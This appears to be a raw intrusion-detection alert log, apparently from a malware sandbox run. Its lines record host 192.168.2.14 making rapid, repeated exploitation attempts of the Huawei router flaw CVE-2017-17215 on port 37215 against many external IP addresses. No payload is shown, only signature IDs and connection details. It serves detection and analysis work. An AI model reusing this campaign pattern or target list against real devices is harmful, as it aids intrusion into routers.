                                            06/14/24-10:43:50.072495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5364037215192.168.2.14197.178.92.35
                                            06/14/24-10:43:43.941027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4695037215192.168.2.14156.53.163.238
                                            06/14/24-10:44:04.421426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4750237215192.168.2.1441.126.223.81
                                            06/14/24-10:43:54.202062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5177437215192.168.2.14156.28.143.143
                                            06/14/24-10:44:33.134472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5905237215192.168.2.14197.116.224.36
                                            06/14/24-10:43:43.941790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4098037215192.168.2.14197.90.112.205
                                            06/14/24-10:43:50.072660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5955037215192.168.2.14197.239.9.94
                                            06/14/24-10:43:36.704931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3524437215192.168.2.14156.175.5.233
                                            06/14/24-10:44:14.670295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4856037215192.168.2.1441.112.19.68
                                            06/14/24-10:44:18.765315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3471837215192.168.2.14197.229.89.166
                                            06/14/24-10:44:16.735016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4506037215192.168.2.14156.100.111.78
                                            06/14/24-10:43:39.809527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4522037215192.168.2.14156.66.191.152
                                            06/14/24-10:43:43.968216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4808237215192.168.2.1441.187.198.58
                                            06/14/24-10:44:29.023985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3380037215192.168.2.14156.145.60.223
                                            06/14/24-10:44:18.762336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5027237215192.168.2.1441.160.190.201
                                            06/14/24-10:44:33.134331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3477837215192.168.2.1441.193.108.32
                                            06/14/24-10:44:31.053176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5335237215192.168.2.14197.27.117.197
                                            06/14/24-10:44:29.027739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5463437215192.168.2.14156.225.173.123
                                            06/14/24-10:43:50.111197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5553837215192.168.2.14197.32.114.210
                                            06/14/24-10:44:00.339428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3710237215192.168.2.1441.78.92.143
                                            06/14/24-10:44:08.504295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4144237215192.168.2.1441.0.157.52
                                            06/14/24-10:44:24.934883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4234237215192.168.2.1441.205.233.241
                                            06/14/24-10:44:33.151421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4684237215192.168.2.14197.165.79.231
                                            06/14/24-10:44:20.827779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009837215192.168.2.14156.181.175.241
                                            06/14/24-10:44:33.132670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4210437215192.168.2.14156.11.253.151
                                            06/14/24-10:44:10.563956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131237215192.168.2.14156.238.222.180
                                            06/14/24-10:44:14.673080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3773237215192.168.2.14156.211.89.102
                                            06/14/24-10:44:18.776016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5844837215192.168.2.14197.68.26.5
                                            06/14/24-10:44:16.735393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4160037215192.168.2.14156.245.49.216
                                            06/14/24-10:43:50.110762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3858837215192.168.2.14197.25.121.9
                                            06/14/24-10:44:29.011347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5120037215192.168.2.14197.196.106.113
                                            06/14/24-10:44:10.548523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3877237215192.168.2.14197.130.25.248
                                            06/14/24-10:44:14.689585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3792037215192.168.2.1441.25.140.23
                                            06/14/24-10:43:43.943083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3521237215192.168.2.14156.45.197.221
                                            06/14/24-10:43:43.943502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3871237215192.168.2.1441.206.16.122
                                            06/14/24-10:43:39.812367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6009037215192.168.2.14197.199.147.250
                                            06/14/24-10:44:06.473646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4321237215192.168.2.1441.50.126.212
                                            06/14/24-10:44:18.762650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4596837215192.168.2.14197.227.50.7
                                            06/14/24-10:44:12.617492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3929037215192.168.2.14156.196.219.37
                                            06/14/24-10:44:10.546409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3847437215192.168.2.14197.75.132.38
                                            06/14/24-10:44:18.763106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4752637215192.168.2.14197.35.186.94
                                            06/14/24-10:43:56.245292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5780637215192.168.2.14156.180.113.75
                                            06/14/24-10:44:08.503520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255237215192.168.2.14197.154.41.51
                                            06/14/24-10:44:10.565806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4110237215192.168.2.14156.55.24.145
                                            06/14/24-10:44:22.883013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5410437215192.168.2.14156.227.5.5
                                            06/14/24-10:43:58.294188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5650237215192.168.2.14197.108.195.198
                                            06/14/24-10:44:04.421455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4946637215192.168.2.14197.97.87.177
                                            06/14/24-10:44:33.134710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4979437215192.168.2.14197.174.211.65
                                            06/14/24-10:43:48.034677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4451637215192.168.2.14197.117.43.101
                                            06/14/24-10:44:24.917010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5568237215192.168.2.14156.132.100.58
                                            06/14/24-10:44:06.453667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5216837215192.168.2.1441.246.230.44
                                            06/14/24-10:43:39.793123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4751037215192.168.2.14197.254.162.167
                                            06/14/24-10:43:45.991113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5853837215192.168.2.14156.251.87.234
                                            06/14/24-10:44:16.715763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4145837215192.168.2.1441.38.187.64
                                            06/14/24-10:43:39.791733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5091637215192.168.2.1441.46.168.23
                                            06/14/24-10:43:41.846918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3977637215192.168.2.1441.2.173.196
                                            06/14/24-10:44:29.027491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5532637215192.168.2.14197.86.18.121
                                            06/14/24-10:44:26.978656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5063837215192.168.2.14197.237.113.8
                                            06/14/24-10:44:08.502481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084037215192.168.2.14197.152.68.189
                                            06/14/24-10:44:20.807550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6000437215192.168.2.1441.243.86.239
                                            06/14/24-10:43:50.073344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5531437215192.168.2.14156.206.196.47
                                            06/14/24-10:44:31.053337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4761237215192.168.2.14156.224.110.155
                                            06/14/24-10:43:48.017508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5990837215192.168.2.14156.33.142.225
                                            06/14/24-10:43:56.245947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5947837215192.168.2.14197.72.112.125
                                            06/14/24-10:43:48.031954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4489837215192.168.2.14156.28.147.134
                                            06/14/24-10:43:54.186617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4400037215192.168.2.14156.135.106.111
                                            06/14/24-10:43:41.849483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5011037215192.168.2.14156.131.104.9
                                            06/14/24-10:43:48.018561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5629037215192.168.2.1441.170.158.195
                                            06/14/24-10:43:52.148303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223637215192.168.2.14197.136.111.221
                                            06/14/24-10:43:37.762653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3469037215192.168.2.14197.53.253.110
                                            06/14/24-10:43:41.849676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5003837215192.168.2.1441.25.141.131
                                            06/14/24-10:43:56.252882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4462037215192.168.2.1441.235.169.189
                                            06/14/24-10:44:29.009911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4619637215192.168.2.1441.1.1.201
                                            06/14/24-10:44:22.860372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3494437215192.168.2.1441.71.57.254
                                            06/14/24-10:43:45.969655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714437215192.168.2.1441.179.181.176
                                            06/14/24-10:43:50.074308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4689037215192.168.2.14197.122.187.150
                                            06/14/24-10:44:12.614369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5265037215192.168.2.14156.63.236.215
                                            06/14/24-10:44:33.151795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5286437215192.168.2.1441.193.211.115
                                            06/14/24-10:43:37.761361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4441237215192.168.2.1441.145.151.129
                                            06/14/24-10:44:26.978763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3296637215192.168.2.14156.98.82.18
                                            06/14/24-10:43:52.148818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4837637215192.168.2.14156.99.176.180
                                            06/14/24-10:44:24.914978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5367837215192.168.2.14156.46.248.88
                                            06/14/24-10:43:36.701468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5666437215192.168.2.14156.206.33.66
                                            06/14/24-10:44:22.879361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3855437215192.168.2.14156.128.131.162
                                            06/14/24-10:43:39.811074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5137037215192.168.2.14197.143.9.163
                                            06/14/24-10:44:31.057267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4952437215192.168.2.1441.103.107.213
                                            06/14/24-10:43:56.243713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5035037215192.168.2.14156.116.22.104
                                            06/14/24-10:44:06.472322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4723237215192.168.2.1441.50.65.41
                                            06/14/24-10:43:48.017679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3984637215192.168.2.1441.60.210.172
                                            06/14/24-10:43:36.703900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5655837215192.168.2.14156.57.82.86
                                            06/14/24-10:43:37.772579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4139637215192.168.2.14197.142.220.142
                                            06/14/24-10:44:02.365783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3367437215192.168.2.14156.159.145.44
                                            06/14/24-10:43:37.761745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3778837215192.168.2.14156.221.28.61
                                            06/14/24-10:43:36.699465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4560837215192.168.2.14197.23.121.148
                                            06/14/24-10:44:14.682392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5307237215192.168.2.1441.150.137.185
                                            06/14/24-10:44:26.979340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201637215192.168.2.14197.204.119.179
                                            06/14/24-10:44:26.979647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5100437215192.168.2.1441.221.211.156
                                            06/14/24-10:43:43.940509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5721437215192.168.2.14156.217.142.194
                                            06/14/24-10:44:20.805881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3800237215192.168.2.14156.62.62.219
                                            06/14/24-10:43:34.677630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4488437215192.168.2.14197.73.253.240
                                            06/14/24-10:44:29.022274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3555437215192.168.2.1441.24.90.249
                                            06/14/24-10:44:22.859843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5390237215192.168.2.14197.165.5.86
                                            06/14/24-10:43:54.184790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4754237215192.168.2.14156.5.45.237
                                            06/14/24-10:44:10.542872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3460837215192.168.2.1441.211.115.23
                                            06/14/24-10:44:20.805474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5280037215192.168.2.1441.132.56.76
                                            06/14/24-10:44:02.383127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4213637215192.168.2.14197.113.60.158
                                            06/14/24-10:44:18.779842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5291437215192.168.2.14156.82.67.30
                                            06/14/24-10:43:52.147190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4782637215192.168.2.14156.52.12.151
                                            06/14/24-10:44:12.640789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5407037215192.168.2.14197.151.102.196
                                            06/14/24-10:43:36.699275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5410637215192.168.2.1441.67.94.127
                                            06/14/24-10:44:33.134607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3767437215192.168.2.1441.19.238.183
                                            06/14/24-10:43:43.969651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4363437215192.168.2.14197.32.60.24
                                            06/14/24-10:44:02.367326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5523837215192.168.2.14197.88.122.85
                                            06/14/24-10:43:58.274853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3897037215192.168.2.1441.176.116.189
                                            06/14/24-10:44:00.323352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6018237215192.168.2.1441.9.118.166
                                            06/14/24-10:43:34.678571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5116637215192.168.2.14197.50.232.201
                                            06/14/24-10:44:20.805448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4688637215192.168.2.1441.241.96.172
                                            06/14/24-10:43:48.020139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5891237215192.168.2.14156.184.133.167
                                            06/14/24-10:43:48.029525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4030037215192.168.2.1441.28.71.181
                                            06/14/24-10:44:14.672571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4478237215192.168.2.14156.48.199.48
                                            06/14/24-10:43:43.970953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4889437215192.168.2.14156.56.50.212
                                            06/14/24-10:43:37.761215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5916837215192.168.2.14197.94.166.201
                                            06/14/24-10:44:08.519385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4349437215192.168.2.14197.81.252.138
                                            06/14/24-10:43:36.704441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966237215192.168.2.14197.211.33.33
                                            06/14/24-10:43:37.759929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4375237215192.168.2.1441.205.241.159
                                            06/14/24-10:44:12.614141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4065837215192.168.2.1441.15.68.19
                                            06/14/24-10:44:33.151575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6012037215192.168.2.14197.240.53.92
                                            06/14/24-10:43:41.907329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686837215192.168.2.14156.154.111.51
                                            06/14/24-10:44:20.829140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4724837215192.168.2.1441.121.87.144
                                            06/14/24-10:43:54.184403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5821237215192.168.2.14197.177.170.106
                                            06/14/24-10:43:52.163258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5071837215192.168.2.14156.1.221.115
                                            06/14/24-10:44:00.321618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3396637215192.168.2.1441.232.120.248
                                            06/14/24-10:44:18.774926TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5580037215192.168.2.14197.4.196.179
                                            06/14/24-10:43:37.760950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3932837215192.168.2.1441.231.141.130
                                            06/14/24-10:43:54.184599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3613837215192.168.2.14197.114.190.125
                                            06/14/24-10:43:50.074374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5830837215192.168.2.1441.203.69.123
                                            06/14/24-10:44:16.716459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4943837215192.168.2.14197.17.206.13
                                            06/14/24-10:43:48.028406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4549037215192.168.2.14156.31.34.162
                                            06/14/24-10:43:52.164881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399837215192.168.2.1441.229.6.167
                                            06/14/24-10:44:12.641640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4075637215192.168.2.14197.97.144.0
                                            06/14/24-10:43:54.183418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4057837215192.168.2.14197.178.113.243
                                            06/14/24-10:43:58.277395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3325037215192.168.2.14156.125.140.72
                                            06/14/24-10:44:18.766353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5380837215192.168.2.14197.64.146.234
                                            06/14/24-10:44:08.503845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4864837215192.168.2.1441.11.90.92
                                            06/14/24-10:44:06.472462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5884037215192.168.2.14156.250.122.18
                                            06/14/24-10:43:43.968638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586437215192.168.2.1441.115.100.90
                                            06/14/24-10:43:45.987599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4525437215192.168.2.14156.36.118.142
                                            06/14/24-10:43:56.243306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5721037215192.168.2.14197.94.192.90
                                            06/14/24-10:43:37.758837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5025437215192.168.2.14197.41.53.1
                                            06/14/24-10:44:33.150854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761437215192.168.2.1441.149.13.123
                                            06/14/24-10:44:08.501989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4141637215192.168.2.1441.185.155.2
                                            06/14/24-10:44:06.470607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5083837215192.168.2.14156.89.104.78
                                            06/14/24-10:44:35.176878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3899837215192.168.2.1441.236.173.110
                                            06/14/24-10:43:48.018312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3843637215192.168.2.14156.226.85.177
                                            06/14/24-10:44:06.453638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4637237215192.168.2.14156.207.190.183
                                            06/14/24-10:44:18.779200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5599037215192.168.2.14197.20.44.95
                                            06/14/24-10:44:12.614591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3445437215192.168.2.14156.10.186.96
                                            06/14/24-10:44:20.830355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513837215192.168.2.14197.39.244.244
                                            06/14/24-10:44:02.368623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5605437215192.168.2.1441.177.87.39
                                            06/14/24-10:44:16.715508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543037215192.168.2.14156.117.98.22
                                            06/14/24-10:43:36.703633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4962037215192.168.2.14197.94.195.84
                                            06/14/24-10:44:08.503189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3868037215192.168.2.1441.136.71.134
                                            06/14/24-10:44:31.086109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3736037215192.168.2.14156.64.19.198
                                            06/14/24-10:43:37.759300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3658637215192.168.2.14156.136.97.38
                                            06/14/24-10:44:20.806783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5523037215192.168.2.1441.62.20.140
                                            06/14/24-10:43:43.969610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5302037215192.168.2.1441.191.247.207
                                            06/14/24-10:43:56.253653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3354837215192.168.2.14197.12.255.27
                                            06/14/24-10:43:45.966273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4591037215192.168.2.14156.0.202.111
                                            06/14/24-10:44:22.858449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4611037215192.168.2.14156.0.104.102
                                            06/14/24-10:44:06.472947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031837215192.168.2.1441.17.236.159
                                            06/14/24-10:44:02.368699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3847437215192.168.2.14197.176.218.69
                                            06/14/24-10:44:16.737590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3484037215192.168.2.14197.231.24.65
                                            06/14/24-10:43:58.292395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5820437215192.168.2.1441.116.5.219
                                            06/14/24-10:43:58.293206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5981837215192.168.2.1441.49.66.246
                                            06/14/24-10:43:36.701770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5123837215192.168.2.1441.121.198.137
                                            06/14/24-10:43:34.675898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428837215192.168.2.1441.25.194.157
                                            06/14/24-10:43:34.677183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5798037215192.168.2.14197.50.119.185
                                            06/14/24-10:44:08.501304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376437215192.168.2.1441.227.104.0
                                            06/14/24-10:44:35.179774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4848237215192.168.2.1441.61.252.103
                                            06/14/24-10:44:24.913620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967637215192.168.2.14156.150.229.29
                                            06/14/24-10:44:02.365505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5682237215192.168.2.14197.133.112.9
                                            06/14/24-10:43:50.072594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5620837215192.168.2.1441.8.50.43
                                            06/14/24-10:44:29.012663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768637215192.168.2.1441.72.252.78
                                            06/14/24-10:43:41.849959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5501437215192.168.2.14156.58.23.199
                                            06/14/24-10:44:20.806178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5900637215192.168.2.1441.86.252.162
                                            06/14/24-10:44:04.423005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3928237215192.168.2.1441.135.20.37
                                            06/14/24-10:43:56.229393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3970637215192.168.2.14156.171.3.190
                                            06/14/24-10:43:54.199917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4546237215192.168.2.14156.16.145.171
